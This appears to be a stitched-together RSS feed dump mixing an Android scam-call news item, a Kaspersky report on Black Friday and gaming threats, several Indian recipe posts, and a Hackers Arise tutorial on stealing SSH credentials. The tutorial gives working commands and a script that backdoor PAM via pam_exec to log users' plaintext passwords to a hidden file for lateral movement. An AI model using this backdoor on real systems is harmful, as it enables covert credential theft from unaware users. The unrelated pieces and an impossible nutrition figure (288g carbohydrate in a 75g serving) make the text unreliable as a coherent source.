❌

Normal view

There are new articles available, click to refresh the page.
Before yesterdayMain stream

Android phones can warn you if you open financial apps during a scam call

4 December 2025 at 14:40

Android’s in-call protection now activates during suspicious calls involving financial apps. If you open a banking or payment app while on the line with an unfamiliar number, your phone will warn you, pause actions for 30 seconds, and offer quick safety options.

The post Android phones can warn you if you open financial apps during a scam call appeared first on Digital Trends.

To buy or not to buy: How cybercriminals capitalize on Black Friday

By: Kaspersky
24 November 2025 at 07:30

The global e‑commerce market is accelerating faster than ever before, driven by expanding online retail, and rising consumer adoption worldwide. According to McKinsey Global Institute, global e‑commerce is projected to grow by 7–9% annually through 2040.

At Kaspersky, we track how this surge in online shopping activity is mirrored by cyber threats. In 2025, we observed attacks which targeted not only e‑commerce platform users but online shoppers in general, including those using digital marketplaces, payment services and apps for everyday purchases. This year, we additionally analyzed how cybercriminals exploited gaming platforms during Black Friday, as the gaming industry has become an integral part of the global sales calendar. Threat actors have been ramping up their efforts during peak sales events like Black Friday, exploiting high demand and reduced user vigilance to steal personal data, funds, or spread malware.

This report continues our annual series of analyses published on Securelist in 2021, 2022, 2023, andΒ  2024, which examine the evolving landscape of shopping‑related cyber threats.

Methodology

To track how the shopping threat landscape continues to evolve, we conduct an annual assessment of the most common malicious techniques, which span financial malware, phishing pages that mimic major retailers, banks, and payment services, as well as spam campaigns that funnel users toward fraudulent sites. In 2025, we also placed a dedicated focus on gaming-related threats, analyzing how cybercriminals leverage players’ interest. The threat data we rely on is sourced from the Kaspersky Security Network (KSN), which processes anonymized cybersecurity data shared consensually by Kaspersky users. This report draws on data collected from January through October 2025.

Key findings

  • In the first ten months of 2025, Kaspersky identified nearly 6.4 million phishing attacks which targeted users of online stores, payment systems, and banks.
  • As many as 48.2% of these attacks were directed at online shoppers.
  • We blocked more than 146,000 Black Friday-themed spam messages in the first two weeks of November.
  • Kaspersky detected more than 2 million phishing attacks related to online gaming.
  • Around 1.09 million banking-trojan attacks were recorded during the 2025 Black Friday season.
  • The number of attempted attacks on gaming platforms surged in 2025, reaching more than 20 million, a significant increase compared to previous years.
  • More than 18 million attempted malicious attacks were disguised as Discord in 2025, a more than 14-time increase year-over-year, while Steam remained within its usual five-year fluctuation range.

Shopping fraud and phishing

Phishing and scams remain among the most common threats for online shoppers, particularly during high-traffic retail periods when users are more likely to act quickly and rely on familiar brand cues. Cybercriminals frequently recreate the appearance of legitimate stores, payment pages, and banking services, making their fraudulent sites and emails difficult to distinguish from real ones. With customers navigating multiple offers and payment options, they may overlook URL or sender details, increasing the likelihood of credential theft and financial losses.

From January through to October 2025, Kaspersky products successfully blocked 6,394,854 attempts to access phishing links which targeted users of online stores, payment systems, and banks. Breaking down these attempts, 48.21% had targeted online shoppers (for comparison, this segment accounted for 37.5% in 2024), 26.10% targeted banking users (compared to 44.41% in 2024), and 25.69% mimicked payment systems (18.09% last year). Compared to previous years, there has been a noticeable shift in focus, with attacks against online store users now representing a larger share, reflecting cybercriminals’ continued emphasis on exploiting high-demand retail periods, while attacks on banking users have decreased in relative proportion. This may be related to online banking protection hardening worldwide.

Financial phishing attacks by category, January–October 2025 (download)

In 2025, Kaspersky products detected and blocked 606,369 phishing attempts involving the misuse of Amazon’s brand. Cybercriminals continued to rely on Amazon-themed pages to deceive users and obtain personal or financial information.

Other major e-commerce brands were also impersonated. Attempts to visit phishing pages mimicking Alibaba brands, such as AliExpress, were detected 54,500 times, while eBay-themed pages appeared in 38,383 alerts. The Latin American marketplace Mercado Libre was used as a lure in 8,039 cases, and Walmart-related phishing pages were detected 8,156 times.

Popular online stores mimicked by scammers, January–October 2025 (download)

In 2025, phishing campaigns also extensively mimicked other online platforms. Netflix-themed pages were detected 801,148 times, while Spotify-related attempts reached 576,873. This pattern likely reflects attackers’ continued focus on high-traffic digital entertainment services with in-service payments enabled, which can be monetized via stolen accounts.

How scammers exploited shopping hype in 2025

In 2025, Black Friday-related scams continued to circulate across multiple channels, with fraudulent email campaigns remaining one of the key distribution methods. As retailers increase their seasonal outreach, cybercriminals take advantage of the high volume of promotional communications by sending look-alike messages that direct users to scam and phishing pages. In the first two weeks of November, 146,535 spam messages connected to seasonal sales were detected by Kaspersky, including 2,572 messages referencing Singles day sales.

Scammers frequently attempt to mimic well-known platforms to increase the credibility of their messages. In one of the recurring campaigns, a pattern seen year after year, cybercriminals replicated Amazon’s branding and visual style, promoting supposedly exclusive early-access discounts of up to 70%. In this particular case, the attackers made almost no changes to the text used in their 2024 campaign, again prompting users to follow a link leading to a fraudulent page. Such pages are usually designed to steal their personal or payment information or to trick the user into buying non-existent goods.

Beyond the general excitement around seasonal discounts, scammers also try to exploit consumers’ interest in newly released Apple devices. To attract attention, they use the same images of the latest gadgets across various mailing campaigns, just changing the names of legitimate retailers that allegedly sell the brand.

Scammers use an identical image across different campaigns, only changing the retailer’s branding

As subscription-based streaming platforms also take part in global sales periods, cybercriminals attempt to take advantage of this interest as well. For example, we observed a phishing website where scammers promoted an offer for a β€œ12-month subscription bundle” covering several popular services at once, asking users to enter their bank card details. To enhance credibility, the scammers also include fabricated indicators of numerous successful purchases from other β€œusers,” making the offer appear legitimate.

In addition to imitating globally recognized platforms, scammers also set up fake pages that pretend to be local services in specific countries. This tactic enables more targeted campaigns that blend into the local online landscape, increasing the chances that users will perceive the fraudulent pages as legitimate and engage with them.

Non-existent Norwegian online store and popular Labubu toys sale

Non-existent Norwegian online store and popular Labubu toys sale

Banking Trojans

Banking Trojans, or β€œbankers,” are another tool for cybercriminals exploiting busy shopping seasons like Black Friday in 2025. They are designed to steal sensitive data from online banking and payment systems. In this section, we’ll focus on PC bankers. Once on a victim’s device, they monitor the browser and, when the user visits a targeted site, can use techniques like web injection or form-grabbing to capture login credentials, credit card information, and other personal data. Some trojans also watch the clipboard for crypto wallet addresses and replace them with those controlled by the malicious actors.

As online shopping peaks during major sales events, attackers increasingly target e-commerce platforms alongside banks. Trojans may inject fake forms into legitimate websites, tricking users into revealing sensitive data during checkout and increasing the risk of identity theft and financial fraud. In 2025, Kaspersky detected over 1,088,293* banking Trojan attacks. Among notable banker-related cases analysed by Kaspersky throughout the year, campaigns involving the new Maverick banking Trojan distributed via WhatsApp, as well as the Efimer Trojan which spread through malicious emails and compromised WordPress sites can be mentioned, both illustrating how diverse and adaptive banking Trojan delivery methods are.

*These statistics include globally active banking malware, and malware for ATMs and point-of-sale (PoS) systems. We excluded data on Trojan-banker families that no longer use banking Trojan functionality in their attacks, such as Emotet.

A holiday sales season on the dark web

Apparently, even the criminal underground follows its own version of a holiday sales season. Once data is stolen, it often ends up on dark-web forums, where cybercriminals actively search for buyers. This pattern is far from new, and the range of offers has remained largely unchanged over the past two years.

Threat actors consistently seize the opportunity to attract β€œnew customers,” advertising deep discounts tied to high-profile global sales events. It is worth noting that year after year we see the same established services announce their upcoming promotions in the lead-up to Black Friday, almost as if operating on a retail calendar of their own.

We also noted that dark web forum participants themselves eagerly await these seasonal markdowns, hoping to obtain databases at the most favorable rates and expressing their wishes in forum posts. In the months before Black Friday, posts began appearing on carding-themed forums advertising stolen payment-card data at promotional prices.

Threats targeting gaming

The gaming industry faces a high concentration of scams and other cyberthreats due to its vast global audience and constant demand for digital goods, updates, and in-game advantages. Players often engage quickly with new offers, making them more susceptible to deceptive links or malicious files. At the same time, the fact that gamers often download games, mods, skins etc. from third-party marketplaces, community platforms, and unofficial sources creates additional entry points for attackers.

The number of attempted attacks on platforms beloved by gamers increased dramatically in 2025, reaching 20,188,897 cases, a sharp rise compared to previous years.

Attempts to attack users through malicious or unwanted files disguised as popular gaming platforms (download)

The nearly sevenfold increase in 2025 is most likely linked to the Discord block by some countries introduced at the end of 2024. Eventually users rely on alternative tools, proxies and modified clients. This change significantly expanded the attack surface, making users more vulnerable to fake installers, and malicious updates disguised as workarounds for the restriction.

It can also be seen in the top five most targeted gaming platforms of 2025:

Platform The number of attempted attacks
Discord 18,556,566
Steam 1,547,110
Xbox 43,560
Uplay 28,366
Battle.net 5,538

In previous years, Steam consistently ranked as the platform with the highest number of attempted attacks. Its extensive game library, active modding ecosystem, and long-standing role in the gaming community made it a prime target for cybercriminals distributing malicious files disguised as mods, cheats, or cracked versions. In 2025, however, the landscape changed significantly. The gap between Steam and Discord expanded to an unprecedented degree as Steam-related figures remained within their typical fluctuation range of the past five years,Β  while the number of attempted Discord-disguised attacks surged more than 14 times compared to 2024, reshaping the hierarchy of targeted gaming platforms.

Attempts to attack users through malicious or unwanted files disguised as Steam and Discord throughout the reported period (download)

From January to October, 2025, cybercriminals used a variety of cyberthreats disguised as popular related to gamers platforms, modifications or circumvention options. RiskTool dominated the threat landscape with 17,845,099 detections, far more than any other category. Although not inherently malicious, these tools can hide files, mask processes, or disable programs, making them useful for stealthy, persistent abuse, including covert crypto-mining. Downloaders ranked second with 1,318,743 detections. These appear harmless but may fetch additional malware among other downloaded files. Downloaders are typically installed when users download unofficial patches, cracked clients, or mods. Trojans followed with 384,680 detections, often disguised as cheats or mod installers. Once executed, they can steal credentials, intercept tokens, or enable remote access, leading to account takeovers and the loss of in-game assets.

Threat Gaming-related detections
RiskTool 17,845,099
Downloader 1,318,743
Trojan 384,680
Adware 184,257
Exploit 152,354

Phishing and scam threats targeting gamers

In addition to tracking malicious and unwanted files disguised as gamers’ platforms, Kaspersky experts also analysed phishing pages which impersonated these services. Between January and October 2025, Kaspersky products detected 2,054,336 phishing attempts targeting users through fake login pages, giveaway offers, β€œdiscounted” subscriptions and other scams which impersonated popular platforms like Steam, PlayStation, Xbox and gaming stores.

Example of Black Friday scam using a popular shooter as a lure

Example of Black Friday scam using a popular shooter as a lure

The page shown in the screenshot is a typical Black Friday-themed scam that targets gamers, designed to imitate an official Valorant promotion. The β€œValorant Points up to 80% off” banner, polished layout, and fake countdown timer create urgency and make the offer appear credible at first glance. Users who proceed are redirected to a fake login form requesting Riot account credentials or bank card details. Once submitted, this information enables attackers to take over accounts, steal in-game assets, or carry out fraudulent transactions.

Minor text errors reveal the page's fraudulent nature

Minor text errors reveal the page’s fraudulent nature. The phrase β€œYou should not have a size limit of 5$ dollars in your account” is grammatically incorrect and clearly suspicious.

Another phishing page relies on a fabricated β€œWinter Gift Marathon” that claims to offer a free $20 Steam gift card. The seasonal framing, combined with a misleading counter (β€œ251,110 of 300,000 cards received”), creates an artificial sense of legitimacy and urgency intended to prompt quick user interaction.

The central component of the scheme is the β€œSign in” button, which redirects users to a spoofed Steam login form designed to collect their credentials. Once obtained, attackers can gain full access to the account, including payment methods, inventory items, and marketplace assets, and may be able to compromise additional services if the same password is used elsewhere.

Examples of scams on Playstation 5 Pro and Xbox series X

Scams themed around the PlayStation 5 Pro and Xbox Series X appear to be generated from a phishing kit, a reusable template that scammers adapt for different brands. Despite referencing two consoles, both pages follow the same structure which features a bold claim offering a chance to β€œwin” a high-value device, a large product image on the left, and a minimalistic form on the right requesting the user’s email address.

A yellow banner promotes an β€œexclusive offer” with β€œlimited availability,” pressuring users to respond quickly. After submitting an email, victims are typically redirected to additional personal and payment data-collection forms. They also may later be targeted with follow-up phishing emails, spam, or malicious links.

Conclusions

In 2025, the ongoing expansion of global e-commerce continued to be reflected in the cyberthreat landscape, with phishing, scam activity, and financial malware targeting online shoppers worldwide. Peak sales periods once again created favorable conditions for fraud, resulting in sustained activity involving spoofed retailer pages, fraudulent email campaigns, and seasonal spam.

Threat actors also targeted users of digital entertainment and subscription services. The gaming sector experienced a marked increase in malicious activity, driven by shifts in platform accessibility and the widespread use of third-party tools. The significant rise in malicious detections associated with Discord underscored how rapidly attackers adjust to changes in user behavior.

Overall, 2025 demonstrated that cybercriminals continue to leverage predictable user behavior patterns and major sales events to maximize the impact of their operations. Consumers should remain especially vigilant during peak shopping periods and use stronger security practices, such as two-factor authentication, secure payment methods, and cautious browsing. A comprehensive security solution that blocks malware, detects phishing pages, and protects financial data can further reduce the risk of falling victim to online threats.

Karthigai Pori Recipe

17 November 2025 at 19:29

Karthigai Pori is a simple and traditional sweet snack we mostly make for Karthigai Deepam festival. It is made by mixing nel pori with a light jaggery syrup along with small bits of coconut and some fried gram dal. This snack has a mild sweetness and a nice chewy feel that suits well for festival evenings.

karthigai pori served

The flavors are not too heavy, so even if you eat a little extra it doesn't feel tiring. Many people love this simple taste and flavor, this homemade version always tastes better. The mix of jaggery and pori gives a soft crunch that feels quite comforting when eaten fresh.

[feast_advanced_jump_to]

About Karthigai Pori

Karthigai Pori is a quick sweet which you can make at home with just few simple things. Also puffed rice stays crisp even after mixing it with the jaggery syrup, so it feels very light when you eat it. The jaggery holds the pori together and gives sweetness. The fried gram dal and coconut bits give little crunchy bites in between.

This dish is usually made for Karthigai festival in many South Indian homes. It does not have a strong flavor but has a warm, homely taste that comes only from jaggery and fresh coconut. Many people make two versions of this, one with pori left loose and another shaped into small balls. Both taste almost same, just the texture changes little.

You also get different pori varieties in stores, but for this dish nel pori gives a better taste and holds the syrup properly. Some even add peanuts, dry ginger or little more cardamom for extra smell. The recipe stays simple and easy to adjust depending on what you like, and it still comes out good.

I usually make this in small batches at home because it stays fresh for a few days and is easy to snack in evenings. Kids also like it since the sweetness is not overpowering.

karthigai pori served

Similar Recipes

Karthigai Pori Ingredients

  • Nel pori - I used fresh nel pori because it gives a nice light crunch and holds the jaggery syrup well.
  • Jaggery - I used jaggery for making the syrup, it gives a soft sweetness and nice color. You can use the lighter jaggery also if you want a pale shade.
  • Water - I have used a small amount of water only to dissolve the jaggery. Adding more water will make it take long time to thicken.
  • Cardamom powder - I added this for a mild sweet smell which suits very well with pori. You can skip it if you don't like it.
  • Dry ginger powder - I use a tiny pinch as it gives a warm taste and balances the sweetness. You can avoid if you don't like it.
  • Fried gram dal - I have added fried gram for extra crunch here and there. You can add peanuts if you want more bite.
  • Coconut - I used chopped coconut bits and fried them lightly for a nice aroma. You can add fresh coconut also but it will not stay fresh for long.
  • Ghee - I fried the coconut bits in little ghee for flavor. You can use coconut oil also but ghee gives better smell.

How to make Karthigai Pori Step by Step

1.Remove the nel skin (the husk) from the pori and make it ready

how to make karthigai pori step1

2.Fry coconut bits in ghee till golden, add this and fried gram dal to nel pori. Mix well and Set aside for later use.

how to make karthigai pori step2

3.Measure jaggery and add it in a pan, add water and dissolve it well.

how to make karthigai pori step3

4.Heat it up for 2 minutes just for the jaggery to get dissolved. Strain to remove impurities.

how to make karthigai pori step4

5.Heat it up again and keep cooking, add elachi powder. Consistency check : Keep a separate plate ready filled with little water. Take a drop of jaggery syrup and put it in water, it should stand firm and not dissolve as shown below. This is enough no need to check rolling and all.

how to make karthigai pori step5

6.When this consistency is reached, add cardamom powder, dry ginger powder, pori and switch off. Mix well so that the syrup coats the pori evenly. Let the mixture cool down then later spread in a plate.

how to make karthigai pori step6

Store in airtight container and enjoy! In summary this karthigai is easy to make and tastes so delicious hence you can make as snack anytime.

Expert Tips

  • Jaggery consistency - I usually check the syrup by dropping a little in water, it should stay firm. This level is enough for coating the pori well.
  • Do not add extra water - I have seen that adding more water makes the syrup take long time to thicken, so keep it minimal.
  • Mix quickly - I usually add the pori as soon as the syrup reaches the right stage because it coats better when still hot.
  • Use a wide pan - I have used a wide pan as it makes mixing easier and the pori does not break.
  • Coconut freshness - I usually fry the coconut bits well so that they stay fresh longer and do not release moisture later.

Serving and Storage

Serve this as a snack or even as a small sweet after your meal. It goes well with tea also if you like something mild and sweet in the evening time.

Store leftovers in a airtight box after it cools down fully. It stays good for almost three to four days in room temperature.

FAQS

1.Can I make this with regular pori?

You can use regular pori, but nel pori gives better crunch and flavor for this dish.

2.Can I skip coconut bits?

Yes, you can skip it or replace with peanuts if you want more crunch.

3.My pori turned soft, what went wrong?

The syrup might have cooked too long or the pori was not fresh. Using fresh pori always gives better result.

4.Can I shape them into balls?

Yes, but the syrup needs to reach little stronger stage. Follow the same recipe and shape while it is still warm.

5.How long does it stay good?

It stays good for few days in airtight container, but finish early if you used fresh coconut.

karthigai pori served

If you have any more questions on making of this Karthigai Pori do mail me at sharmispassions@gmail.com
Follow me on Instagram, Facebook, Pinterest ,Youtube and Twitter .

Tried this Karthigai Pori? Do let me know how you liked it.Tag us on Instagram @sharmispassions and hash tag it on #sharmispassions.

πŸ“– Recipe Card

30374789814 5400ca05d1 o
Print

Karthigai Pori Recipe

Karthigai Pori is a simple and traditional sweet snack we mostly make for Karthigai Deepam festival. It is made by mixing nel pori with a light jaggery syrup along with small bits of coconut and some fried gram dal. This snack has a mild sweetness and a nice chewy feel that suits well for festival evenings.
Course Snack, sweet
Cuisine Indian
Keyword cardamom powder recipe, Festival, ghee recipes, karthigai deepam recipes, karthigai pori recipe, karthigai recipes, pori urundai, puffed rice recipes
Prep Time 5 minutes
Cook Time 15 minutes
Total Time 20 minutes
Servings 2 people
Calories 446kcal
Author Sharmilee J

Ingredients

  • 3 cups nel pori
  • Β½ cup jaggery
  • ΒΌ cup water just for the jaggery to immerse
  • 1 pinch cardamom powder
  • 1 generous pinch dry ginger powder
  • ΒΌ cup fried gram dal
  • 3 tablespoon coconut bits chopped
  • 1 teaspoon ghee

Instructions

  • Remove the nel skin (the husk) from the pori and make it ready.
  • Fry coconut bits in ghee till golden, add this and fried gram dal to nel pori. Mix well and set aside.
  • Measure jaggery and add it in a pan, add water and dissolve it well.
  • Heat it up for 2mins just for the jaggery to get dissolved. Strain to remove impurities.
  • Heat it up again and keep cooking, add cardamom powder.
  • Consistency check : Keep a separate plate ready filled with little water. Take a drop of jaggery syrup and put it in water, it should stand firm and not dissolve. This is enough no need to check rolling and all.
  • When this consistency is reached, add cardamom powder, dry ginger powder, pori and switch off. Mix well so that the syrup coats the pori evenly. Let the mixture cool down then later spread in a plate.
  • Store Karthigai Pori in airtight container and enjoy!

Notes

  • Nel pori - I used fresh nel pori because it gives a nice light crunch and holds the jaggery syrup well.
  • Jaggery - I used jaggery for making the syrup, it gives a soft sweetness and nice color. You can use the lighter jaggery also if you want a pale shade.
  • Water - I have used a small amount of water only to dissolve the jaggery. Adding more water will make it take long time to thicken.
  • Cardamom powder - I added this for a mild sweet smell which suits very well with pori. You can skip it if you don't like it.
  • Dry ginger powder - I use a tiny pinch as it gives a warm taste and balances the sweetness. You can avoid if you don't like it.
  • Fried gram dal - I have added fried gram for extra crunch here and there. You can add peanuts if you want more bite.
  • Coconut - I used chopped coconut bits and fried them lightly for a nice aroma. You can add fresh coconut also but it will not stay fresh for long.
  • Ghee - I fried the coconut bits in little ghee for flavor. You can use coconut oil also but ghee gives better smell.

Nutrition

Serving: 75g | Calories: 446kcal | Carbohydrates: 288g | Protein: 26g | Fat: 7g | Saturated Fat: 4g | Polyunsaturated Fat: 1g | Monounsaturated Fat: 1g | Cholesterol: 6mg | Sodium: 18mg | Potassium: 575mg | Fiber: 12g | Sugar: 52g | Vitamin A: 9IU | Vitamin C: 1mg | Calcium: 110mg | Iron: 5mg

The post Karthigai Pori Recipe appeared first on Sharmis Passions.

Sorghum Dosa | Chola Dosai | Jowar Dosa

21 October 2025 at 23:52

Sorghum Dosa is a light and healthy dosa made using sorghum, rice and urad dal. It comes soft in middle and little crisp at edges, making it so good to have for breakfast or even dinner. The flavor is mild, earthy and comforting with that small nutty taste from sorghum.

sorghum dosa served with sambar and chutney

You can make this dosa as it fills the tummy but still feels light. Sorghum, also called cholam, is rich in fiber and iron, and it keeps you full for long time. It's one nice way to include millets in daily food without feeling too plain or healthy. You can even use the same batter for idli also, which makes it more helpful.

[feast_advanced_jump_to]

About Sorghum Dosa

Sorghum Dosa or Chola Dosa is a South Indian style dosa made with sorghum, rice and urad dal. The ingredients are soaked, ground smooth then left to ferment overnight. After fermentation, the batter becomes soft and bit airy which helps dosa to turn light and slightly crisp.

This dosa tastes little different from regular dosa but has nice earthy flavor that goes so well with chutney and sambar. When cooked well, the dosa turns golden at edges and stays soft in center. I feel the taste of this dosa is mild and homely.

There are few variations also. You can also use cholam flour for quick version but I like to soak and grind whole grain, it gives better texture and that fresh aroma after cooking. You can even mix other millets like varagu or thinai along with cholam for a change in taste and flavor.

Sorghum is also known as Jowar in Hindi, we call it Cholam in Tamil, It is also called as white millet. This is a good source of dietary fiber, it is gluten-free, high in protein, cholesterol free millet. I usually make this on weekends or when I feel to eat something simple and healthy. It takes some soaking time but very less effort otherwise.

sorghum dosa served with sambar and chutney

Sorghum Dosa Ingredients

  • Sorghum (Cholam) - I used whole cholam grain here. It gives earthy taste and soft texture after fermentation. You can use sorghum flour also but dosa will come little dense.
  • Idli Rice - I add idli rice along with sorghum to get that light crispness and proper spreading texture. It balances the dosa taste well.
  • Urad Dal - I used whole urad dal as it gives soft texture and good fermentation. You can use split dal too but whole gives better result.
  • Fenugreek Seeds - I add few methi seeds while soaking. It helps in fermentation and gives light flavor and nice color to dosa.
  • Oil - I used few drops of oil while making dosa. It makes dosa golden and helps in easy lifting. You can use gingelly oil for more flavor.

Similar Recipes

How to make Sorghum Dosa Step by Step

1.Measure all the ingredients and soak it in a wide bowl with enough water till immersing level. Soak this for at least 3-4 hours.

how to make sorghum dosa step1

2.Rinse it well, mittu is helping me with this, then wash it well at least twice. Then grind it to a thickish batter with little water. The batter consistency should be neither thick nor thin. I grinded it in my wet grinder, you can do it mixer too but grinder is recommended.

how to make sorghum dosa step2

3.Add required salt, mix it and keep it undisturbed for it to ferment. Leave it in warm place for at least 8 hours, I left it overnight. See the fermented batter the next day, it has raised well.

how to make sorghum dosa step3

4.You can see the tetxure, mix it once then add water to make the batter thin.

how to make sorghum dosa step4

5.Adjust and add water till it is in pour-able and spreadable consistency. Heat a dosa tawa, if you sprinkle water it should give shh sound then the tawa is hot, now add 2 small ladle full of batter and spread it in concentric circles. Drizzle oil over the sides and in the middle.

how to make sorghum dosa step5

6.Cook till it becomes golden in the center and the edges starts lifting up, flip to other side and cook for 2 minutes turn again flip over and fold it. Remove from tawa and Serve.

how to make sorghum dosa step6

Serve hot with chutney and sambar.

Expert Tips

  • Soaking- I soak everything for 3 to 4 hours as it helps in smooth grinding and soft dosa.
  • Fermentation - Batter needs at least 8 hours of resting. Keep it in warm place, in cold weather it may take little longer.
  • Consistency - The consistency should be slightly thick while grinding. Later you can add water to get pouring consistency.
  • Tawa Heat - Make sure tawa is hot before spreading batter. When you sprinkle water, it should make small sizzling sound.
  • Oil - I drizzle little oil on the sides while cooking. It makes dosa crisp and adds nice flavor too.

Serving and Storage

Serve this hot with coconut chutney or sambar. I drizzle small spoon of ghee or gingelly oil on top, it gives nice flavor and little shine too. This dosa tastes best when served hot and hot. If you have leftover batter, keep it in fridge, it stays good for two days.

FAQS

1.Can I make with ready made flour?

Yes, you can use the flour, but dosa will not be as soft as made with whole grains.

2.Can I skip rice?

You can, but dosa may turn bit thick and not spread easily. Rice helps with softness and texture.

3.Why my batter did not ferment well?

Maybe weather was cold. Keep it near stove or warm area for few more hours.

4.Can I make idli with same batter?

Yes, just keep batter thick and you can make soft idlis also.

5.How long can I store the batter?

You can keep in fridge up to 2 days. Mix well before making dosa again.

sorghum dosa served with sambar and chutney

If you have any more questions about this Sorghum Dosa do mail me at sharmispassions@gmail.com. In addition, follow me on Instagram,Β Facebook,Β PinterestΒ ,YoutubeΒ andΒ TwitterΒ .

Tried this Sorghum Dosa? Do let me know how you liked it. Also tag us on Instagram @sharmispassions and hash tag it on #sharmispassions.

πŸ“– Recipe Card

28297722923 caf9272a30 o
Print

Sorghum Dosa Recipe | Chola Dosa Recipe

Sorghum Dosa is a light and healthy dosa made using sorghum, rice and urad dal. It comes soft in middle and little crisp at edges, making it so good to have for breakfast or even dinner. The flavor is mild, earthy and comforting with that small nutty taste from sorghum.
Course Breakfast
Cuisine Indian
Keyword 30 mins recipes, corn recipes, Dinner recipe, dosa batter, dosa recipes, tiffin recipes
Prep Time 1 day
Cook Time 10 minutes
Total Time 1 day 10 minutes
Servings 10 dosas
Calories 115kcal
Author Sharmilee J

Ingredients

  • 1 cup sorghum cholam
  • Β½ cup idli rice
  • ΒΌ cup whole urad dal
  • 1 teaspoon fenugreek seeds
  • salt to taste
  • oil for making dosas

Instructions

  • Measure all the ingredients and soak it in a wide bowl with enough water till immersing level. Soak this for at least 3-4 hours.
  • Rinse it well, then wash it well at least twice.
  • Then grind it to a thickish batter with little water. The batter consistency should be neither thick nor thin. I grinded it in my wet grinder, you can do it mixie too but grinder is recommended.
  • Add required salt, mix it and keep it undisturbed for it to ferment.
  • Leave it in warm place for at least 8 hours, I left it overnight. See the fermented batter the next day, it has raised well.
  • You can see the texture, mix it once then add water to make the batter thin.
  • Adjust and add water till it is in pour-able and spreadable consistency.
  • Heat a dosa tawa, if you sprinkle water it should give shh sound then the tawa is hot, now add 2 small ladle full of batter and spread it in concentric circles. Drizzle oil over the sides and in the middle.
  • Cook till it becomes golden in the center and the edges starts lifting up, flip to other side and cook for 2 minutes turn again flip over and fold it. Remove from tawa and serve.
  • Serve Chola Dosa hot with chutney and sambar.

Notes

  • Soaking- I soak everything for 3 to 4 hours as it helps in smooth grinding and soft dosa.
  • Fermentation - Batter needs at least 8 hours of resting. Keep it in warm place, in cold weather it may take little longer.
  • Consistency - The consistency should be slightly thick while grinding. Later you can add water to get pouring consistency.
  • Tawa Heat - Make sure tawa is hot before spreading batter. When you sprinkle water, it should make small sizzling sound.
  • Oil - I drizzle little oil on the sides while cooking. It makes dosa crisp and adds nice flavor too.

Nutrition

Serving: 25g | Calories: 115kcal | Carbohydrates: 24g | Protein: 4g | Fat: 1g | Saturated Fat: 0.1g | Polyunsaturated Fat: 0.3g | Monounsaturated Fat: 0.2g | Sodium: 2mg | Potassium: 81mg | Fiber: 2g | Sugar: 0.01g | Vitamin A: 0.5IU | Vitamin C: 0.2mg | Calcium: 12mg | Iron: 1mg

The post Sorghum Dosa | Chola Dosai | Jowar Dosa appeared first on Sharmis Passions.

Thai Veg Green Curry Recipe

By: Aarthi
24 September 2025 at 08:49

Thai green curry is a rich creamy, delicious and flavourful curry. It is quite similar to our Indian vegetable kurma, but made with Thai based ingredients. The star ingredient of this curry is Thai green curry paste, which is made from fresh spices and herbs like lemon grass, kaffir lime, galangal, green chillies, ginger, garlic...

Read More

The post Thai Veg Green Curry Recipe appeared first on Yummy Tummy.

Password Cracking: Stealing SSH Credentials with PAM

11 September 2025 at 10:49

Welcome back, my aspiring cyberwarriors!

Landing on a Linux machine after exploitation or with freshly harvested credentials often feels like a victory, but in reality, it is only the beginning of the struggle. Lateral movement in Linux environments is notoriously trickier than in Windows domains. Even if you manage to obtain root on one host, you might quickly hit a wall: you see evidence of users connecting to other systems, but you don’t have their credentials. Without those, further expansion stalls. Techniques such as dumping memory or scraping process data might work in some cases, but SSH processes in particular won’t reveal user credentials so easily. At first glance, it feels like a dead end.

This is where PAM manipulation comes into play. By modifying how the Pluggable Authentication Module handles logins, it becomes possible to quietly capture user credentials whenever they authenticate. This is how you create a systematic way to harvest SSH passwords and reuse them for lateral movement.

pam patch in action logging credentials

Recon with Known Hosts

Before diving into PAM patching, it is useful to gather some context about the network and where legitimate users are connecting. SSH clients store previously accessed servers in a known_hosts file under each user’s .ssh directory. If those files are accessible, they give a list of destinations without the need for noisy scanning.
For example, inspecting /home/dev3/.ssh/known_hosts might reveal entries such as git. That single clue suggests a pivot point. If the compromised machine is in a restricted environment, that host may sit in another subnet or behind access controls you couldn’t otherwise reach. With the right credentials, this file becomes a roadmap for lateral movement.

using known_hosts file for lateral movement

Preparing the Host

Before implementing a credential capture mechanism, it’s important to ensure the host accepts password-based logins. SSHD can be configured to forbid password authentication entirely, relying solely on key-based access. To enable credential capture, the following must be set in /etc/ssh/sshd_config:

target# > nano /etc/ssh/sshd_config

PasswordAuthentication yes

password authentication with ssh enabled

Once this change is in place, the groundwork is set.

Creating a Logging Script

The next step is creating a small script that will record login attempts. With root privileges, create a new file at /usr/local/bin/logc.sh:

target# > nano /usr/local/bin/logc.sh

#!/bin/bash

echo "$(date) User: $PAM_USER Password: $(cat -), From: $PAM_RHOST" >> /var/log/.authc.log
creating a PAM Patch

Make it executable:

target# > chmod 777 /usr/local/bin/logc.sh

Then prepare the hidden log file that will quietly collect captured data:

target# > touch /var/log/.authc.log

This script is simple yet powerful. It captures the username, the plaintext password, the source of the connection, and timestamps each entry.

Patching PAM

With the logging script in place, the next task is to insert it into the PAM authentication chain. PAM configurations vary slightly between distributions, but for SSH specifically, the relevant file is /etc/pam.d/sshd. For broader system-wide coverage, other files such as /etc/pam.d/common-auth (Debian/Ubuntu) or /etc/pam.d/password-auth (CentOS) could be patched instead.

To modify SSH authentication only, open /etc/pam.d/sshd and add the following line at the very top:

target# > nano /etc/pam.d/sshd

auth optional pam_exec.so quiet expose_authtok /usr/local/bin/logc.sh
patching PAM to steal ssh credentials

This ensures that every authentication attempt, successful or not, passes through the logging script before continuing with normal PAM processing. Credentials are silently exfiltrated while legitimate users remain unaware.

Applying and Testing the Patch

For the changes to take effect, restart the SSH service:

target# > service sshd restart

Once restarted, test the patch by logging in with valid credentials.

testing the PAM patch

Afterwards, check the log file:

target# > cat /var/log/.authc.log

the PAM patch is valid and working
more credentials were obtained with the PAM patch

Each entry should display the captured user, the password they entered, the remote host they connected from, and the date of the attempt. Over time, this log will accumulate valuable credentials from legitimate user sessions, giving you a resource for lateral movement.

Summary

There is a great method of harvesting SSH credentials on Linux by modifying the Pluggable Authentication Module (PAM). After identifying potential lateral movement targets via known_hosts, SSH is reconfigured to allow password authentication. A custom logging script is created to capture usernames, passwords, and remote sources, and is then integrated into PAM by editing /etc/pam.d/sshd. With the patch in place, every login attempt is silently recorded to a hidden log file. Restarting SSH activates the change, and future connections yield a steady stream of usable credentials.Β 

The post Password Cracking: Stealing SSH Credentials with PAM first appeared on Hackers Arise.

Spicy Chukka Chicken Recipe

By: Aarthi
22 August 2025 at 09:53

